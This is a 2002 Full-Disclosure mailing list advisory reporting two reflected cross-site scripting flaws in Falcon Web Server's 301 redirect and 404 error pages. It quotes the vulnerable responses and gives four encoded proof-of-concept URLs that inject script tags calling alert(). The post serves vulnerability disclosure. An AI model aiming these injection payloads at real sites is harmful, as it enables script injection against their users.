[Full-Disclosure] Cross-Site Scripting Issues in Falcon Web Server

From: Matthew Murphy (mattmurphyat_private)
Date: Thu Aug 08 2002 - 16:31:20 PDT


    From Developer:
    
    "Falcon Web Server is running under Windows NT/2000/XP as well as Windows
    95/98. It supports ISAPI and WinCGI, and it is a fully functional web
    server which is capable of running a small / medium scale website of about
    50-80 hits per minute.  The real advantage of Falcon Web Server is the
    ability to run on a desktop computer with almost the same functionality as
    large-scale web servers like MS IIS and Apache."
    
    A lack of input sanitation in the error message output of this server makes
    it susceptible to two cross-site scripting vulnerabilities:
    
    * An issue in the way the server handles 301 messages when a file is not
    found, and the request is not terminated by a slash.  Falcon simply adds a
    slash to the request URI, and sends back a 301 with the following entity:
    
    <html><head><title>/<SCRIPT>alert("xss")</SCRIPT>/</title></head><body>
    Redirecting browser to <a href="/<SCRIPT>alert("xss")</SCRIPT>/">/<SCRIPT>alert("xss")</SCRIPT>/</a><br>
    If nothing happens click the link above.</body></html>
    
    * An issue in the way the server handles 404 messages when a file/folder is
    not found, and the necessary slash has been added (entity below):
    
    <html><head><title>HTTP/1.0 404 Not Found</title></head><body>
    <h1>/<SCRIPT>alert("xss")</SCRIPT>/index.html Not Found</h1>
    <p>Cannot locate the requested file.</body></html>
    
    Examples:
    
    * 301 Message XSS
    
    Closing TITLE tag:
    http://localhost/%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
    Closing A HREF:
    http://localhost/%22%3cscript%3ealert(%22xss%22)%3c/script%3e
    Closing A tag:
    http://localhost/%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
    
    * 404 Message XSS
    
    http://localhost/%3cscript%3ealert(%22xss%22)%3c/script%3e/
    
    The 301 examples will simply add a slash and pass the URI on to the browser,
    which then follows the redirect and receives a 404, so that vulnerability is
    exploited as well (although the 301 exploits will cause some useless HTML to
    be added on).
    
    "The reason the mainstream is thought
    of as a stream is because it is
    so shallow."
                         - Author Unknown
    
    _______________________________________________
    Full-Disclosure - We believe in it.
    Full-Disclosureat_private
    http://lists.netsys.com/mailman/listinfo/full-disclosure
    



    This archive was generated by hypermail 2b30 : Thu Aug 08 2002 - 17:01:03 PDT